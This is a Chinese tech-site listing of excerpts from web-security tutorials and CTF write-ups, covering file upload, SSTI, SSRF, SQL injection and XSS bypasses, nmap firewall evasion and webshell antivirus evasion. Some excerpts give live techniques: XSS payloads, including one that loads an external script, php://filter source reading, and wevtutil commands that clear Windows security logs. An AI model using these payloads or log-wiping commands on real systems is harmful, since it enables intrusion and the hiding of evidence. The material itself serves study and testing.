ICode9

精准搜索请尝试: 精确搜索
  • Upload-labs 文件上传靶场通关攻略(上)2021-07-17 01:04:45

    Upload-labs 文件上传靶场通关攻略(上) 文件上传是Web网页中常见的功能之一,通常情况下恶意的文件上传,会形成漏洞。 逻辑是这样的:用户通过上传点上传了恶意文件,通过服务器的校验后保存到指定的位置。 当用户访问已经上传成功的文件时,上传的Web脚本会被Web容器进行解析,从而对网站造

  • XSS绕过姿势总结2021-07-16 22:32:20

    0x00 XSS基本测试流程 原则是“见框就插”,多动手,这里分享几个经典测试payload: "><svg/onload=alert(1)// 具体引用外部js的代码姿势是: <svg/onload=s=createElement('script');body.appendChild(s);s.src='js地址'// 在火狐浏览器下查看的效果(浏览器解析时会自动加上引号):

  • BMZCTF:端午就该吃粽子2021-07-16 20:01:04

    一.题目 url=http://www.bmzclub.cn:21708/login.php?zhongzi=show.php 输入用户名和密码,发现没有登录效果。 二.解题思路 1.看源码 发现有注释要我们看index.php。 直接访问index.php,发现访问不出什么东西。想到用伪协议,zhongzi=php://filter/read=convert.base64-encode

  • PYthon继承链(egg)的思考和实战2021-07-15 17:34:43

    前言  起初学习ssti的时候,就只是拿着tplmap一顿乱扫,然后进行命令执行,之前深入学习了一下PYthon继承链;今天写个文章进行加深记忆和理解。 基础知识 class 返回一个实例所属的类; 这里可以看到返回了s1mple 类; globals 返回一个当前的空间之下可以利用的模块,方法和变量的字典; 使用

  • 逻辑漏洞详解2021-07-15 13:33:04

    逻辑漏洞 漏洞分类实现漏洞设计漏洞安全配置错误 逻辑漏洞逻辑漏洞分类逻辑漏洞挖掘原理概述绕过验证类漏洞1. 客户端校验绕过2. 客户端信息泄露3. 客户端流程控制4. 操作目标篡改5. 参数篡改6. 暴力破解 越权访问类漏洞交易类漏洞1. 重放攻击2. 数据篡改3. 流程绕过 资

  • nmap 目前绕过防火墙通用策略2021-07-14 22:04:02

    0x00 前言 现在很多的网络应用都被防火墙保护着,那我们平时在进行扫描的时候,往往一无所获,因此我们在面对防火墙/IDS/IPS的防护应用时,该如何使用nmap 绕过这些防火墙的限制进行端口服务扫描? 0x01 使用nmap 脚本进行防火墙检测 root@kali:~# nmap --script=firewalk --traceroute

  • 记录一次app抓包,绕过代理检测2021-07-14 15:29:31

    记录一次app抓包,绕过代理检测 问题解决方案 问题 使用burp对待测app进行抓包时,添加系统代理,app流量未经过burp且不能正常访问;当关掉代理是时,app可以正常访问。 解决方案 使用全局代理工具Postern将app流量全部代理到抓包工具burp的ip端口进行抓包 首先在burp上添加代理的

  • 文件上传漏洞2021-07-08 20:00:43

    什么文件上传 文件上传是一个网站的常见功能,多用于上传照片、视频 、文档等许多类型文件。一般文件上传的流程如下: 前端选择文件,进行提交浏览器形成POST MultiPart报文发送到服务器服务器中间件接受报文,解析后交给相关后端代码进行处理后端代码将上传的文件内容写到临时文件

  • 小课堂 -- sql注入绕过技术2021-07-05 15:04:29

    环境sqli-labs   一、大小写绕过 把关键字修改为And,OrdEr,UniOn。。。   二、双写绕过 把关键字修改为AandND,OOrderrder。。。   三、编码绕过 http://192.168.1.120/sqli/Less-5/?id=1 转换后:http%3A%2F%2F192.168.1.120%2Fsqli%2FLess-5%2F%3Fid%3D1   四、内联注释 /*! selec

  • 红队绕过日志检查2021-06-25 22:00:47

    命令:wevtutil cl 日志类型 wevtutil cl security wevtutil cl Setup wevtutil cl System wevtutil cl Aplication wevtutil cl Forwarded Events 使用Phantom 工具 该脚本遍历事件日志服务进程(特定于svchost.exe)的线程堆栈,并标识事件日志线程以杀死事件日志服务线程。

  • sql注入绕过速查表2021-06-21 15:35:00

    原文:https://x.threatbook.cn/v5/article?threatInfoID=836 直接复制过来的,记录学习一下 过滤and or or ——> ||and ——> &&xor ——> | not ——> !十六进制绕过or ——> o\x72大小写绕过OraNd双写绕过oorrananddurlencode,ascii(char),hex,unicode编码绕过 一些unicode编码举例:

  • SQL注入 fuzz模糊测试 绕过WAF(安全狗) TODO,自己搭建环境测试2021-06-20 19:03:09

      示例绕过:   如何发现上述payload,使用的就是模糊测试,代码示例如下:     If len部分也可以修改成if safedog in result 。。。  

  • 漏洞复现篇——文件上传之mime绕过2021-06-18 14:56:32

    什么是MIME MIME(Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。 绕过上传限制-服务端绕过MIME检测 常见的MIME类型 text/plain

  • SSRF漏洞2021-06-17 10:31:02

    SSRF 漏洞原理漏洞成因攻击方式危害:SSRF的限制:SSRF漏洞绕过方法:利用HTTP基本身份认证的方式绕过 利用302跳转绕过内网IP进制的转换绕过内网IP其他各种指向127.0.0.1的地址 漏洞危害 漏洞原理 SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成并

  • 绕过webshell查杀工具2021-06-11 11:04:00

    简介 个人觉得在编写免杀的webshell的时候,不是随便把几种方式拼凑起来,而是根据提示的信息进行修改。 示例一(2021-6-9) 从图片中可以看出,D盾对于eval(1)虽然报毒,但是级别为1,说明它其实不确定这是不是后门。但是它提示参数为1,说明它能匹配到明文参数,如果参数是变量呢? 当参数是变量

  • xss-代码角度理解与绕过filter2021-06-05 13:33:13

    0x00 原理   xss全称为cross site scripting,中文为跨站脚本攻击。它允许web用户将恶意代码植入到提供给用户使用的页面。代码包括HTML代码和客户端脚本。 0x01 危害 盗取用户账户(获取cookie) 控制网页数据 盗窃企业资料 非法转账 强制发送电子邮件 网站挂马 控制受害者机器向

  • 命令执行-过滤了字母或者过滤了数字+字母的绕过方法2021-06-05 11:37:22

    0x00 序言   总结下命令执行绕过字母数字的一些小技巧。 0x01 原理   管理员为了防止任意用户输入的恶意代码导致的命令执行,在用户输入处加了一层waf拦截,waf可能是通过正则匹配过滤了字母,也可能是通过正则匹配过滤了字母和数字。 0x02 过滤了字母的绕过方式 <?php /* # -*- c

  • MD5注入与MD5比较绕过2021-06-03 23:03:01

    来源[BJDCTF2020]Easy MD5 参考[BJDCTF2020]Easy MD5( .md5( $password, true)绕过)_xlcvv的博客-CSDN博客 HINT   Hint: select * from 'admin' where password=md5($pass,true)    关于md5() md5(string,raw) 参数描述 string 必需。规定要计算的字符串。 raw 可选。

  • 免费绕过工具iFRPFILE All in One 2.4,支持iOS 12.5.3~14.62021-05-31 22:06:36

      支持iPhone5s~X的所有型号,支持iPad5/6/7、iPad Air1/2、iPad mini2/3/4   支持iOS 12.5.3~14.5.1系统版本   工具的特点:   支持Hello界面三网MEID,完美绕过当游戏机玩,支持iCloud登录   支持停用界面的机器完美绕,支持电话、短信、4G上网。  

  • Ubuntu设置一个简单的密码【绕过检测版】2021-05-29 13:34:32

    By default, Ubuntu requires a minimum password length of 6 characters, as well as some basic entropy checks. These values are controlled in the file /etc/pam.d/common-password, which is outlined below. password        [success=1 default=ignore]    

  • 某工业大学XSS引发的批量self-XSS漏洞挖掘2021-05-22 18:30:57

    目录 1.前言 2.绕过WAF打XSS 3.又一WAF绕过(HTTP绕过) 4.指纹搜集:扩大战果   1.前言         现在的XRAY扫描器听说很火,之前还没用过,现在也要研究研究。配置好随手扫了一个。扫出了个XSS。该站点是基于端口的,想必在其他端口用的也是同一个CMS。nmap扫描端口被过滤了。

  • 2021 ciscn web wp2021-05-19 20:58:29

    2021 ciscn web wp upload 复现几道没做出来的题:> upload 发现文件index.php、example.php 知识点1:绕过getimagesize 在上传的文件最后面加上 #define width 1 #define height 1 知识点2:绕过zip字符中的i 结合 https://bugs.php.net/bug.php?id=77375 使用İ字符可以

  • CTF web之旅 422021-05-19 20:04:08

    想通过php://伪协议传入数据 但是才发现上来协议名称就被过滤掉了 参考这篇文章 ssrf中的url绕过 在url中十进制是可以被直接访问的 将ip转化成对应的十进制绕过 但是发现正则中是有0的 被过滤掉了    或者是8进制?也是不行的 首位需要加0 看了师傅的wp  知道了在url中.可以被

  • 【文件上传】---WAF绕过---day242021-05-17 21:04:24

    【文件上传】---WAF绕过---day24 一、数据包能否修改? 1、Content-Disposition:一般可以更改 接收到的类型,form-data指的是表单的数据 2、name:表单参数值,不能更改 name:源代码中name决定 3、filename:文件名,可以更改 上传的文件的名字 4、Content-Type:文件MIME,视情况更改 二、waf绕

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有